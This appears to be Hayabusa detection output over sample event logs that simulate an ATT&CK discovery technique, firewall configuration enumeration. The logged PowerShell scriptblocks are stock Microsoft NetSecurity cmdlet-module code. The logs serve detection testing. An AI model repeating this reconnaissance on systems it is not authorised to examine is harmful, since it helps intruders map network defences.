[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw 
} } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSetting ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { 
Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] 
${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmd",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.145 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,letization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
